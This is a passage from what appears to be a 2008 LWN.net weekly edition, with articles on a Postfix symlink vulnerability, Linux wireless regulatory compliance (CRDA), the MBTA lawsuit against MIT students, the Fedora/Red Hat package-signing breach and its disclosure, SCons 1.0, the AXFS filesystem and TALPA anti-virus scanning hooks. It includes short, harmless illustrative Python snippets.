patch to Postfix.  Protecting the mail spool directory is one solution;
Venema provides a script to use to do that.  Some systems can be configured
to disallow links to files owned by others, which is another way to avoid
the problem. 
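
The idea behind the directory requirement can be sketched in a few lines of
Python.  This is not Postfix's code; the function names are hypothetical,
and the check is simplified (it ignores ACLs and the permissions of
ancestor directories).

```python
import os
import stat


def writable_only_by_root(uid, mode):
    """True if a directory with this owner and mode can be modified only by root."""
    group_or_other_write = mode & (stat.S_IWGRP | stat.S_IWOTH)
    return uid == 0 and not group_or_other_write


def symlink_dir_is_safe(path):
    """Apply the check to the directory containing the symbolic link at path."""
    parent = os.path.dirname(os.path.abspath(path))
    st = os.stat(parent)
    return stat.S_ISDIR(st.st_mode) and writable_only_by_root(st.st_uid, st.st_mode)


if __name__ == "__main__":
    # /dev/null lives in /dev, which is normally root-owned and mode 0755.
    print("/dev/null:", symlink_dir_is_safe("/dev/null"))
```

If an attacker cannot create names in the directory, the attacker cannot
place a hard link to a root-owned symbolic link there, which is the step
the attack depends on.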


This issue has given Postfix a bit of a black eye, but that
is rather unfair. 
The problem was found by a SUSE code inspection, but it has existed in
certain kinds of Linux installations of Postfix for a long time.  It could
be argued that testing should have found it—there is a simple test for
vulnerable systems—but relying on documented behavior that is part of
an important standard that Linux is said to support is not completely
unreasonable either.  It is likely that the full implications of not
supporting the standard were not completely understood until recently.


Linux was still in its infancy when the original change went in.  One would
like to think that a change of that type today would be nearly impossible
because it breaks the kernel's user-space interface.  If it were to happen,
somehow, the resulting hue and cry would be loud enough that application
developers would hear.  But that's for intentional changes; a bug
introduced into a dark corner of the kernel's API might go unnoticed for
quite some time.  Hopefully, none of those lingers for ten years before
being discovered.


Update: The original article referred to CVE-2008-2937
as also being a consequence of the link issue, which it is not.  It is an
unrelated issue that was found during the same code review.

		Regulating wireless devices


Whenever a Linux system communicates with the rest of the world, it must
follow a whole set of rules on how that communication is done.  Basic
TCP/IP networking would work poorly indeed in the absence of an observed
agreement on how the networking medium should be used.  Wireless networking
has all of those constraints, plus a set of its own.  Since wireless
interfaces are radios, they must conform to rules on the frequencies they
can use, how much power they may emit, and so on.  If all goes well, Linux
will finally have a centralized mechanism for ensuring that wireless
devices are operated according to that wider set of rules.


Regulations on radio transmissions bring some extra challenges.  They are
legal code, so their violation can bring users, vendors, and distributors
into unwanted conversations with representatives of spectrum enforcement
agencies.  The legal code is inherently local, while wireless devices are
inherently mobile, so those devices must be able to modify their behavior
to match different sets of rules at different times.  And some wireless
devices can be programmed in quite flexible ways; they can be operated far
outside of their allowed parameters.  The possibility that one of these
devices could be configured - accidentally or intentionally - in a way
which interferes with other uses of the spectrum is very real.

The potential for legal problems associated with wireless interfaces has
cast a shadow over Linux for a while.  Some vendors have used it as an
excuse for their failure to provide free drivers.  Others (Intel, for
example) have reworked their hardware to lock up regulatory compliance
safely within the firmware.  And still, vendors and Linux distributors have
worried about what kind of sanctions might come down if Linux systems are
seen to be operating in violation of the law somewhere on the planet.
Despite all that, the Linux kernel has no central mechanism for ensuring
regulatory compliance; it is up to individual drivers to make sure that
their hardware does not break the rules.  This situation may be about to change,
though, as the Central
Regulatory Domain Agent (CRDA) patch set, currently being
developed by 
Luis Rodriguez, approaches readiness.


At the core of CRDA is struct ieee80211_regdomain, which describes
the rules associated with a given legal regime.  It is a somewhat
complicated structure, but its contents are relatively simple to
understand.  They include a set of allowable frequency ranges; for each
range, the maximum bandwidth, allowable power, and antenna gain are
listed.  There's also a set of flags for special rules; some domains, for
example, do not allow outdoor operation or certain types of modulation.
Each domain is associated with a two-letter identifying code which,
normally, is just a country code.
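
To make the shape of that information concrete, here is a small Python
model of a regulatory domain.  It is only a sketch: the class and field
names are invented for illustration and do not match the kernel's
structure definitions, and the example rule uses made-up numbers rather
than any real country's regulations.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class FreqRule:
    """One allowed frequency range and its limits (hypothetical field names)."""
    start_khz: int
    end_khz: int
    max_bandwidth_khz: int
    max_power_dbm: int
    max_antenna_gain_dbi: int
    flags: frozenset = frozenset()   # special rules, e.g. {"NO_OUTDOOR"}


@dataclass(frozen=True)
class RegDomain:
    """A two-letter domain code plus the rules that apply there."""
    alpha2: str
    rules: tuple

    def permits(self, center_khz, bandwidth_khz, power_dbm):
        """True if some rule covers the whole channel at this power."""
        half = bandwidth_khz // 2
        for rule in self.rules:
            if (rule.start_khz <= center_khz - half
                    and center_khz + half <= rule.end_khz
                    and bandwidth_khz <= rule.max_bandwidth_khz
                    and power_dbm <= rule.max_power_dbm):
                return True
        return False


# Illustrative values only; "XX" is not a real domain.
EXAMPLE = RegDomain("XX", (FreqRule(2402000, 2482000, 40000, 20, 3),))

if __name__ == "__main__":
    print(EXAMPLE.permits(2437000, 20000, 15))
    print(EXAMPLE.permits(2437000, 20000, 30))
```

A driver consulting such a structure would refuse any channel or power
setting for which no rule matches.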


There is a new mac80211 function which drivers can call to get the current
regulatory domain information.  But, unless the system has some clue of
where on the planet it is currently located, that information will be for
the "world domain," which, being 
designed to avoid offending spectrum authorities worldwide, is quite
restrictive.  Location information is often available from wireless access
points, allowing the system to configure itself without user intervention.
Individual drivers can also provide a "location hint" to the regulatory
core, perhaps based on regulatory information written to a device's EEPROM
by its vendor.  If need be, the system administrator can also configure in
a location by hand.


The database of domains and associated rules lives in user space, where it
can be easily updated by distributors.  When the name of the domain is set
within the kernel, an event is generated for udev which, in turn, will be
configured to run the crda utility.  This tool will use the domain
name to look up the rules in the database, then use a netlink socket to
pass that information back to the kernel.  From there, individual drivers
are told of the new rules via a notifier function.



The database is a binary file which is digitally signed; if the signature
does not match a set of public keys built into crda, then
crda will refuse to use it.  This behavior will protect against a
corrupted database, but is also useful for keeping users from modifying it
by hand.  No distributors have made any policy plans public, but one
assumes that the signing keys for the CRDA database will not be distributed
with the system.  We're dealing with free software, so getting around this
kind of restriction will not prove challenging for even moderately
determined users, but it should prevent some people from cranking their
transmitted power to the maximum just to see what happens.

The CRDA mechanism, once merged into the kernel and once the wireless
drivers actually start using it, should be enough to ensure that Linux
systems with well-behaved users will be well-behaved transmitters.  Whether
that will be enough to satisfy the regulatory agencies (some of which have
been quite explicit on their doubts about whether open-source regulatory
code can ever be acceptable) remains to be seen.  But it is about the best
that we can do in a free software environment.

		Injunction lifted against MIT students


Three MIT students won a victory in court this week, but it was a rather
bittersweet one as the injunction that was overturned was, at best,
dubious.  The students had researched the security of the Massachusetts Bay
Transportation Authority's (MBTA) tickets and pre-paid cards.  They were
planning to give a presentation about their findings at the DEFCON security
conference when MBTA
sued them.  Even after the Electronic Frontier Foundation (EFF) stepped
in to represent the students, MBTA was able to get a ten-day injunction
that made 
the presentation impossible.


The judge who issued the injunction relied on the Computer Fraud and Abuse
Act, a statute aimed at preventing computer intrusions, to make his
decision.  He 
ruled that speaking at a conference was a "transmission" of a 
computer program that could harm MBTA by allowing people to get free subway
rides.  The free speech rights of the students, Zack Anderson, RJ Ryan and
Alessandro Chiesa, were completely ignored by the judge.  Unfortunately, when
a second judge lifted the injunction this week, he did it on narrow
grounds, not considering the First Amendment issues either.  Instead, he
ruled that MBTA was unlikely to succeed on the merits of its case.


While the injunction has been lifted, the suit continues.  MBTA is likely
to be the biggest loser in all of this for a number of reasons, not least
of which is the "Streisand Effect".  By trying to squelch discussion of
their security problems, MBTA ensured that the story got much wider play
than it would have as a report from DEFCON.  As Barbra Streisand found out
when she tried to remove aerial pictures of her Malibu estate from a
California coastal survey, suing someone to stop information from flowing
rarely works; in fact, on the internet, it generally backfires. 


After getting an "A" in Professor Ron Rivest's—the R in
RSA—class, the students met with MBTA to outline what they had found.
They 
also provided a confidential report that included all of the details.  They
told MBTA that they planned to keep some of those details 
out of the DEFCON presentation to
stop others from trivially exploiting the system.  With no advance warning,
48 hours before the presentation, MBTA sued to get an injunction.


Had MBTA done its homework, it would have realized that the slides
of the presentation [PDF] were already available, both on the net and
on CDs given to the conference attendees.  Worse still, MBTA entered the
confidential report, with details left out of the presentation, into the
open court record.  For an agency that claimed that release of the
information would cause harm, it did far more harm to
itself than the students did.


It is a common fallacy that security problems are somehow magically kept
at bay if they are not discussed.  Time and again we see organizations try
to stifle discussion of security problems rather than to actually address
them.  Any system that is likely to attract the attention of "white hat"
security researchers is very likely to have attracted others as well.  In
fact, for a system like MBTA's, where large amounts of money can be made,
the chances that someone of malicious intent isn't already looking for
vulnerabilities are vanishingly small.


By treating the "MIT Three" as criminals, MBTA has done itself and the
Boston-area taxpayers a disservice.  The students are willing to work with
the agency to identify and fix the problems, but not while they are being
sued.  The agency told the judge this week that it would take it five
months to fix the problems identified—it is hard to see how that is
expedited by spending time in court.


While the students were under a gag order, various MBTA officials were
saying that there were no security problems.  Because their First Amendment
rights had been suspended, the students were unable to respond to defend
their research.  Only recently has the agency confessed that it does,
indeed, have security problems.  This is one of the reasons that "prior
restraint" on free speech has been deemed unconstitutional in various
cases, including the famous "Pentagon Papers" case.


It is hard to see how the students could have been more "responsible" with
their disclosure.  It is not as if these vulnerabilities came out of left
field; similar types of problems had been reported for other transit
systems.  Had MBTA done its job, the students might not have been able to
find any flaws to report on.  But, instead of thanking them and, perhaps,
hiring them, MBTA tried to bully them.  The next time someone finds a flaw
in their systems, they may decide to anonymously report it with full
details—or exploit it for free subway rides.


		One week of infrastructure issues


On August 14, Fedora leader Paul Frields sent out a terse announcement regarding
"an issue in the infrastructure systems" supporting the project.  This
"issue" could lead to some service outages, for which he apologized.  Also
included in the note was this ominous warning:


	We're still assessing the end-user impact of the situation, but as
	a precaution, we recommend you not download or update any
	additional packages on your Fedora systems.


As this article is written (August 20, just barely in time for the LWN
weekly publication deadline), there have been a couple of uninformative
updates, but the situation persists and nobody seems to know what is really
going on.  The Fedora team, it would seem, is quite good at keeping secrets
when the need arises.  As a result, Fedora users worldwide have spent
almost a full week wondering what has happened and whether they need to be
worried about it.

In such a situation, there is a delightful amount of space for wild
speculation.  Your editor does not usually start his drinking binge until
after publication, but, for the purposes of interpreting the following, one
should assume that it was already well underway.  This "issue" could be
explained by any of the following:


 Maybe a Fedora developer - on a drinking binge of his own, perhaps - 
     tripped over a power cord.  The resulting mess not only deprived
     an important server of power, but said developer, on his way toward
     the floor, managed to take the entire rack down with him.  Ever since,
     the infrastructure team has been trying to reassemble a set of working
     systems from the rubble.

 Last month, Fedora slipped a small patch into gcc designed to ensure
     that the results from the most recent board election - where one slot
     went to a candidate who was not a Red Hat employee - would never be
     repeated.  But the patch was botched, and most mathematical operations
     in gcc-compiled programs have been returning random numbers ever since.
     Now the Fedora team is trying to quietly replace the broken binaries
     before anybody notices.

 It turns out that the rights to the Fedora name had never actually
     been secured, and the real owner got an injunction shutting the
     project down.  As soon as all the branding has been changed, Fedora
     will be reborn as Leopard-Skin Pillbox Hat Linux.  Just wait until you
     see the new desktop themes.

 The package signing key has been compromised, as have the build
     servers.  For the last six months, every version of Firefox shipped
     by Fedora has reported account names, passwords, and credit card
     numbers to a server located on a ship in international waters near
     Colombia.  The openssh client has been similarly modified.  The Fedora
     team has been slow to get an explanation out because it takes time to
     relocate your home and family to an undisclosed location on a
     different continent.

 A vulnerability in RPM has enabled the creation of a large ecosystem
     of hostile mirrors operated by competing criminal groups.  Most Fedora
     users have been installing compromised updates for the last year or
     so.

 No less than three Fedora system administrators turned out to be the
     type of people who will give out
     their password for a bar of chocolate.  The provider of sweets
     really only wanted to fix the longstanding claws-mail dependency
     problems in Rawhide, but the project hit the panic button anyway.

 The Fedora team simply wanted to take a vacation in an undisclosed
     location on a different continent and didn't want to deal with a bunch
     of email on their return.


The real point of this being, of course, that none of us know what is going
on, creating a situation described by Alan
Cox as "leaving people in the dark assuming the worst - a very bad
way to create long term trust."  Distributors occupy a crucial part
of our ecosystem; they absolutely need to have the trust of their
users.  There is just too much that can go wrong at that level.


One can only assume that something fairly serious has happened.  By all
accounts, the Fedora team has been working flat-out to get things resolved
as quickly as possible; they seem to be doing an exceptional job under a
great deal of pressure.  They have undoubtedly earned a big round of thanks
- and lots of beers - from the Fedora community as a whole.


But Fedora's leadership appears to have failed here.  If Fedora users need to be
concerned about the software running on their systems, they should have
been told by now.  If they can relax and stop worrying, they should have
been told that as well.  Instead, the Fedora user community has been left
wondering for nearly a week while the infrastructure they count on is torn
down and rebuilt from the beginning.  Given that, Fedora users have shown a
tremendous amount of patience and restraint; the user community clearly has
a high degree of confidence in the project in general, and has been willing
to wait until the project is ready to come clean.

To retain that confidence, the Fedora project will have to tell the full
story in a clear manner - and sooner would certainly be better.  A good
explanation of why Fedora users were made to wait so long before hearing
anything about how this "infrastructure issue" affects them will also be
needed.  Fedora users are concerned about what has happened so far, but
their real response will be determined by what Fedora does next.

		Fedora, Red Hat, and distributor security


On August 22, the Fedora Project released an "infrastructure report"
confirming what most observers had, by then, suspected: the project had
suffered a major security breach.  The attacker got as far as a system used
to sign packages distributed by Fedora.  That, of course, is something
close to a worst-case scenario: if an intruder has control over such a
system, it's a relatively small step to capture the package signing key and
the passphrase used to employ that key.  And those, in turn, could be used
to create hostile packages which would be accepted as genuine by Fedora
installations worldwide.


Fortunately for the Fedora Project (and its users), an audit has determined
that nobody made use of the key while the intruder was present.  So, even
if some means for capturing something as transient as the passphrase were
in place, that passphrase was not exposed, and, thus, cannot have been
compromised.


Needless to say, the project is changing its package signing key anyway.


Interestingly, the Fedora Project was not the only target in this attack: Red Hat,
too, was compromised.  Unlike Fedora, Red Hat did not issue a statement
specifically about this intrusion; instead, the information was included in
an openssh
security update.  In this case, the attacker was more successful, to
the point of being able to sign "...a small number of OpenSSH
packages relating only to Red Hat Enterprise Linux 4 (i386 and x86_64
architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture
only)." This language deserves to be questioned: it is only
necessary to sign a single openssh package (certainly qualifying as a
"small number") to compromise thousands of RHEL hosts, and the "only" terms
describe what must be a large majority of deployed RHEL systems.  Seriously
scary, but Red Hat has been able to convince itself that none of the
compromised packages were fed out to RHEL subscribers.  So this attack,
too, failed - but not by much.


Needless to say, disclosures like this raise more questions than they
answer.  The one question that Fedora and Red Hat will have to answer at
some point is this: how did the intruder get in?  One assumes that Fedora
and Red Hat are running their own distributions on their internal systems;
it thus stands to reason 
that, if those distributions contained a vulnerability that allowed the
attacker to get in, many other systems will also be vulnerable.  If,
instead, this compromise is the result of administrator or developer error
(or, say, of a lost laptop), administrators responsible for Fedora and RHEL
systems can breathe a little easier.  Either way, they deserve to know how
this series of events came to pass.


Some people would like to have that information immediately.  Beyond that,
there has, predictably, been a fair amount of grumbling (also
predictably, from a relatively small number of people) on the Fedora lists
on how this incident was handled.  Your editor, too, has argued that some information
took too long to emerge.  He will now argue that, while Fedora still has
more to disclose, the project has said enough to give itself some breathing
room while it struggles to put its infrastructure back together and figure
out what really happened.  There are all kinds of good reasons why more
information may not be immediately forthcoming, including the obvious
possibility that nobody really knows yet how the intruder gained access.  There is
little to be gained from hammering on Fedora at this point.

That said, anything the project can say to tell its users whether they
should be worried about an undisclosed vulnerability in their systems would
be most welcome, and sooner would be better than later.

Meanwhile, what can be done, and what Fedora board member Jeff
Spaleta, in particular, has been 
pushing for, is to think about how things should be handled the next time.
Says Jeff:


	Did we have a communication problem? Maybe. But communication
	problems are not equivalent to trust issues.  But considering that
	was a first of its kind event for us as a project, I don't think
	its necessarily unexpected to see some miscommunication. I don't
	think any of us, either inside Red Hat or outside had talked
	through how this sort of thing should be handled.  I don't remember
	a serious public discussion about how to deal with communication of
	an event like this before having an event like this. And I'm not
	going to let the assumption stand that to do things differently
	should have been obvious to those in a position to deal with the
	information...
	
	If people want things to be better, if god forbid something like
	this happens again, then a serious effort to write a communication
	process has to be written up and it must be agreeable to legal as a
	workable process that won't set off any legal liability landmines.


The Fedora Project should certainly write up a policy for situations like
this.  It would be good for Fedora's users, but it could have an effect far
beyond that: such a policy could serve as an example for other distributors
as well.  It is, after all, probably safe to say that Fedora is not the
only distributor which has, thus far, neglected to put plans in place for
this sort of disaster.

We all need such plans.  For better or for worse, distributors have come to
occupy an important position with regard to the security of much of the
net.  Millions of systems run packages signed by Linux distributors; they
depend, implicitly, on the security of the process used to create those
packages.  That process is not a small one; it can involve hundreds of
developers, before even counting all of those involved in upstream
development projects.  The consequences of a failure anywhere in that chain of trust
can be severe.  It is not surprising that the distribution system was
attacked; perhaps the only real surprise is that it has not happened more
often - that we know of.  These attacks will happen again; distributors
need to have a firm idea of how they will respond.

A related subject is worth a quick mention: as of this writing, the Fedora
Project has issued no security updates since August 12, almost a full
two weeks.  A number of significant vulnerabilities, including the Postfix symbolic link
vulnerability, remain unpatched for Fedora users.  Red Hat has done
better, but not by much.  Linux users depend heavily on the distributor
security update process, and, for these two distributions, that process has
been severely disrupted.  If there had been a truly serious vulnerability
disclosed during this time, people charged with keeping Fedora and RHEL
systems secure might have found themselves in a difficult position.  One
need not be overly paranoid to envision this type of disruption being done
intentionally as part of a zero-day attack on the net.


This incident should serve as a sort of wake-up call for both distributors
and their users.  Distributors wanting to retain their users' trust should
be thinking about documenting things like:


 How the packaging chain is kept secure.  It would be good to know 
     how many people are able to sign packages, and how they gain access to
     the systems where this signing is done.

 What sort of plans the distributor has in place for dealing with
     security problems.  One can only assume that Red Hat dedicated (and
     continues to dedicate) a large amount of staff time to understanding
     and recovering from this incident.  Would other distributors be willing
     and able to do the same?

 What are the plans for dealing with a major security breach?  How
     might a critical security update be propagated during a time when the
     integrity of the packaging system has been compromised?

 Should something go wrong, when and how will information be
     communicated to the wider community?


Conversely, anybody who is deploying an important Linux-based system should
be asking such questions when choosing a distribution for that system.  If
the system requires high-assurance guarantees in this regard, it probably
makes sense to look at the vendors who are willing to provide such
guarantees for a fee.  But, again, the lesson we have learned from recent
events is that the time to ask these questions is now, and not when
something has gone wrong and people are running around in circles.


As a whole, Linux users have been very well served by distributors since
the very beginning.  The distributors pull together thousands of software
releases and integrate them into a coherent whole; they then make the
results available, often for free.  They provide fixes when things break,
and most of them pay particular attention to fixing security-related
problems.  And they have done a top-quality job of not being used as a
conduit for hostile software.  It's a great system, and that has not
changed.  But we have learned something about how heavily we depend on that
system, and how it can fail.  Proper application of the lessons from this
episode should help us all to be more secure in the future.

		The SCons build tool reaches the 1.0 milestone


After a two-month release candidate stabilization period, version
1.0 of the SCons
build tool has been released. The SCons description states:


SCons is an Open Source software construction tool - that is, a next-generation build tool. Think of SCons as an improved, cross-platform substitute for the classic Make utility with integrated functionality similar to autoconf/automake and compiler caches such as ccache. In short, SCons is an easier, more reliable and faster way to build software.


SCons is being distributed under the MIT license.
Steven Knight is the main developer; the rest of the SCons development
team consists of
Chad Austin, Charles Crain, Steve Leblanc, Greg Noel, Gary Oberbrunner,
Anthony Roach, Greg Spencer and Christoph Wiedemann.
The SCons project history is described as follows:


SCons began life as the ScCons build tool design which won the Software Carpentry SC Build competition in August 2000. That design was in turn based on the Cons software construction utility. This project has been renamed SCons to reflect that it is no longer directly connected with Software Carpentry (well, that, and to make it slightly easier to type...). 


An SCons document entitled TheBigPicture and the Wikipedia entry
explain some of the unique SCons features.
These include:

 Designed in a modular fashion.
 Uses Python scripts for configuration files.
 Has automatic dependency analysis features for C, C++ and Fortran.
 Supports many other languages and documentation formats.
 Supports multiple compilers for a given language.
 Provides a global view of all source tree dependencies.
 Uses MD5 signatures for detecting file changes.
 Has built-in support for numerous version control systems.
 Can access a large number of utility tools.
 Operates with a large collection of command line options.
 Integrates with a number of popular IDEs.
 Supports parallel compilation with load control.
 Is user extensible.
 Supports cross-platform operation and project development.
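
The idea of using content signatures rather than timestamps to detect
changes can be sketched in Python as follows.  This is not SCons's
implementation; the function names and the dictionary used to remember
signatures are assumptions made for the example.

```python
import hashlib
import os
import tempfile


def md5_signature(path, chunk_size=65536):
    """Return the MD5 hex digest of a file's contents."""
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def needs_rebuild(path, stored):
    """True if the file's content differs from the signature remembered in stored."""
    return stored.get(path) != md5_signature(path)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "hello.c")
        with open(src, "w") as f:
            f.write("int main(void) { return 0; }\n")
        stored = {src: md5_signature(src)}

        os.utime(src, (0, 0))             # timestamp changes, content does not
        print("after touch:", needs_rebuild(src, stored))

        with open(src, "a") as f:         # content changes
            f.write("/* edited */\n")
        print("after edit:", needs_rebuild(src, stored))
```

Unlike a timestamp comparison, this approach does not trigger a rebuild
when a file is merely touched, at the cost of reading every file to compute
its signature.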


To get an idea of where SCons stands among the variety of build tools
that are available, the documentation includes
a comparison between SCons and other tools.
The project's documentation is quite voluminous.
The nearly 10,000-line man page
is somewhat daunting; it even dwarfs the 8,000-line
mplayer man page.  Fortunately, the document is available in an indexed
HTML version for easier reading.


A test installation of SCons 1.0 was tried on an Ubuntu i386 Hardy
Heron machine.  The code was downloaded, uncompressed, and untarred, then
the following command was executed as root from the source directory:
python setup.py install.
A test of SCons was performed on a relatively simple C program
that prints out the data from a stepped sine wave (sine2hex.c).
After plowing through some of the man page and doing a bit of
digging through the SCons User Guide, your author
succeeded in compiling and linking the program.
An SConstruct file was created to describe the project; it consisted of
a single line.

Typing scons caused SCons to compile and link the program.
That is, of course, only the tip of the iceberg, but it shows that
the software is not too difficult to get started with.
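
For a single-file C program such as sine2hex.c, a one-line SConstruct would
typically be a single call to SCons's Program builder.  The following is a
sketch of such a file, not necessarily the exact line used in this test:

```python
# SConstruct: build an executable from one C source file.
# SCons derives the program name (sine2hex) from the source file name.
Program('sine2hex.c')
```

SConstruct files are Python scripts that SCons reads with its builders
(such as Program) already defined, so this file is meant to be run through
the scons command rather than executed directly with Python.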


SCons is being used by a variety of closed and open-source
software projects; the
References
section lists these and includes user comments about the
advantages of switching from other build tools.
If you need a next-generation tool for maintaining a large
cross-platform project, SCons should be able to do the job.


		AXFS: a compressed, execute-in-place filesystem


Filesystems are clearly an area of high development interest at the moment;
hardly a week goes by without a new filesystem release for Linux popping up
on some list or other.  All of this development is motivated by a number of factors,
including the increasing size of storage devices and the increasing
capability of solid-state storage.  Beyond that, though, there is the simple
fact that there is no single filesystem which is optimal for all
applications.  The recently-announced AXFS filesystem is a clear
example of what can be done if one targets a specific use case and
optimizes for that case only.


At first impression, AXFS seems like a simple and limited filesystem.  It
is, for example, read-only; the AXFS developers have made no provision for
changing the filesystem after it is created.  Some filesystems have a great
deal of code dedicated to the creation of the optimal layout of file blocks
on disk; AXFS has none of that.  Instead, it has a simple format which
divides the media into "regions" and, almost certainly, spreads accesses
across the device.  There is no journaling, no logging, no snapshots, and
no multi-device volume management.


What AXFS does provide is compressed storage using zlib.  It is, clearly,
aimed at embedded systems using flash-based storage.  For such devices, a
compressed filesystem can be built using the provided tools, then loaded
into a minimal amount of flash on each device.  It thus joins a number of
other compressed filesystems - cramfs and squashfs, for example - provided
for this sort of application.  One interesting aspect of compressed,
flash-oriented filesystems is their apparent ability to stay out of the mainline
kernel.  By posting AXFS for review on linux-kernel, developer Jared
Hulbert may be trying to avoid a similar fate.


The feature which makes AXFS different from squashfs and cramfs is its
support for execute-in-place (XIP) files.  Some types of flash can be
mapped directly into the processor's address space.  When running programs
stored on that flash, copying pages of executable code from flash into main
memory seems like a bit of a waste: since that code is already addressable
by the processor, why not run it from the flash?  Executing code directly
from flash saves RAM; it also makes things faster by eliminating the need
to copy those pages into RAM at page fault time.  As a result, systems
using XIP tend to boot more quickly, a feature which designers (and users)
of embedded systems appreciate.


Linux has had an execute-in-place
mechanism for a few years now, but relatively few filesystems make use
of it.  AXFS has been designed from the beginning to facilitate XIP
operation - that's its reason for existence (and the origin of the "X" in
its name).  

There is an additional twist, though.  One would ordinarily consider
compressed storage and XIP to be mutually exclusive - there is little value
in mapping compressed executable code into a process's address space.  To
be executed in place, a page of code must be stored uncompressed.
What makes AXFS unique is its ability to mix compressed and uncompressed
pages in the same executable file.  So pages which will be frequently
accessed can be stored uncompressed and executed in place.  Pages with
infrequently-needed code or which contain initialized data can be stored
compressed to save space and decompressed at fault time.

This is a slick feature, but it is not of great use if one does not know
which pages of an executable file are heavily enough used to justify
storing them without compression.  Trying to determine this information and
manually pick the representation of each page seems like an error-prone
exercise - not to mention one which would tend to create high employee
turnover.  So another method is needed.

To that end, AXFS provides a built-in profiling mechanism.  Each AXFS
filesystem is represented by a virtual file under /proc/axfs;
writing "on" to that file will cause AXFS to make a note of every
page fault within the filesystem.  Reading that file then yields 
spreadsheet-like output showing, for each file, how many times each page
was faulted into the page cache.  Using this data, it is possible to
generate an AXFS filesystem image with an optimal number of compressed
pages for the target system.
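
As a rough illustration of how profiling data could drive that choice, here is a minimal Python sketch.  The article does not describe the format of the /proc/axfs output or the policy used by the image-building tools, so the dictionary layout, the file paths, and the "budget" of uncompressed pages below are all assumptions made for the example.

```python
def choose_xip_pages(fault_counts, budget):
    """Pick up to `budget` pages to store uncompressed, hottest first.

    fault_counts maps (path, page_index) -> number of recorded page faults.
    This layout is hypothetical; it is not the real /proc/axfs format.
    """
    # Pages that were never faulted in gain nothing from being XIP.
    hot = [(key, count) for key, count in fault_counts.items() if count > 0]
    # Highest fault count first; ties are broken on the key for determinism.
    hot.sort(key=lambda item: (-item[1], item[0]))
    return {key for key, _ in hot[:budget]}


# Made-up profile data for two files.
profile = {
    ("/bin/busybox", 0): 120,
    ("/bin/busybox", 1): 3,
    ("/bin/busybox", 2): 0,
    ("/lib/libc.so", 0): 45,
}

# With room for two uncompressed pages, the two hottest pages are chosen.
xip_pages = choose_xip_pages(profile, budget=2)
```

Everything not in the returned set would be stored compressed; a real tool would presumably also weigh the amount of flash available.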

Filesystems normally need a few rounds of review before they can make it
into the mainline; some filesystems need rather more than that.  AXFS is
sufficiently simple, though, that it may find a quicker path into the
kernel.  So far, the comments have mostly been positive, with the biggest
complaint being, perhaps, that its name is
too close to that of the existing XFS filesystem.  So a 2.6.28 merge for
AXFS, while far from guaranteed, would appear to be not entirely out of the
question.

		TALPA strides forward


When last we left TALPA, it was still floundering around without a
solid threat model, but over the last several weeks that part has
changed.  Eric Paris proposed
a fairly straightforward—though still somewhat
controversial—model for the threats that TALPA is supposed to
handle.  With that in place, there is at least a framework for kernel
hackers to evaluate different
ways to solve the problem, while also keeping in mind other potential uses.  


It seems almost tautological, but anti-virus scanners are supposed
to, well, scan files.  In particular, they scan for known
malware and block access to files that
are found to be infected.  For better or worse, scanning files is seen
as an 
essential security mechanism by many, so TALPA is trying to provide a means
to that end.  Paris describes it this way:

This is a file scanner.  There may be all
sorts of marketing material or general beliefs that they provide
security against all sorts of wide and varied threats (and they do),
but in all reality the only threats they provide any help against are
those that can be found by scanning files.  Simple as that.  Some may
argue this isn't "good" security and I'm not going to make a strong
argument to the contrary, I can stand here for days and show cases where
this is highly useful but no one can provide a threat model more than to
say, "we attempt to locate files which may be harmful somewhere in the
digital ecosystem and try to deny access to that data."


All of the various scenarios where active processes can infect files with
malware or actively try to avoid scanning can be ignored under this model.
While this looks like "security theater" to some, it avoids the endless
what-ifs that were bogging down earlier discussions.  It may not be a
threat model
that appeals to many of the kernel hackers, but it is one that they can
work with.


To many kernel developers—used to efficiency at nearly any
cost—time-consuming
filesystem scans seem ludicrous, especially since they only
"solve" a subset of the malware problem.  But the fact remains that Linux
users, particularly in "enterprise" environments, believe they need this
kind of scanning and are willing to pay for products that provide it.  The
current methods used by anti-virus vendors to do the scanning are
problematic at best, causing users to run kernels tainted with binary
modules.  With a threat model—however limited—in place, work
can proceed 
to find the right way to add this functionality into the kernel.


Paris is narrowing in on a design that
calls out to user space, both synchronously and asynchronously depending on
the operation.  File access might go something like this:

- open() - causes interested user-space programs to be notified
  asynchronously; anti-virus scanners might kick off a scan if needed
- read()/mmap() - causes a synchronous user-space notification, which
  allows anti-virus scanners to block access until scanning is complete; if
  malware is found, the read/mmap returns an error
- write() - whenever the modification time (mtime) of a file is
  updated, asynchronously notify user space; this would allow anti-virus
  scanners to re-scan the data as desired
- close() - asynchronous user-space notification; another place
  where anti-virus scanners could re-scan if the file has been dirtied
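
The sequence above can be modeled in a few lines of Python.  This is only a toy, user-space illustration of which notifications block and which do not; the class names, the "EVIL" marker, and the file path are invented for the example and have nothing to do with the actual TALPA patches.

```python
class Scanner:
    """Stand-in for a user-space anti-virus scanner (hypothetical)."""

    def __init__(self, bad_marker=b"EVIL"):
        self.bad_marker = bad_marker
        self.events = []  # asynchronous notifications received so far

    def notify(self, event, path):
        # Asynchronous: the event is recorded and the caller continues.
        self.events.append((event, path))

    def allow_read(self, data):
        # Synchronous: the caller waits for this verdict.
        return self.bad_marker not in data


class ScannedFile:
    def __init__(self, path, data, scanner):
        self.path, self.data, self.scanner = path, data, scanner
        scanner.notify("open", path)             # open(): asynchronous

    def read(self):
        if not self.scanner.allow_read(self.data):  # read(): synchronous
            raise PermissionError(f"{self.path}: blocked by scanner")
        return self.data

    def write(self, data):
        self.data = data
        self.scanner.notify("mtime", self.path)  # write(): async, on mtime change

    def close(self):
        self.scanner.notify("close", self.path)  # close(): asynchronous


scanner = Scanner()
f = ScannedFile("/tmp/example", b"hello", scanner)
first_read = f.read()            # clean data is returned
f.write(b"EVIL payload")
try:
    f.read()
    blocked = False
except PermissionError:
    blocked = True               # the infected data is refused
f.close()
```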


Where and how to store the current scanning status of a file is still an
open question.  Various proposals have been discussed, starting with a
non-persistent flag in the in-memory inode of a file.  While simple, that
would cause a lot of unnecessary additional scanning as inodes drop out
of the cache.  Persistent storage of the scanned status of a file
alleviates that problem, but runs into another: how do you handle multiple
anti-virus products (or, more generally, scanners of various sorts); whose
status gets stored with the inode?


For this reason, user-space scanners will need to keep their own database
of information about which inodes have been scanned.  Anti-virus
scanners will also want to keep information about which version of
the virus database was used.  Depending on the application, that
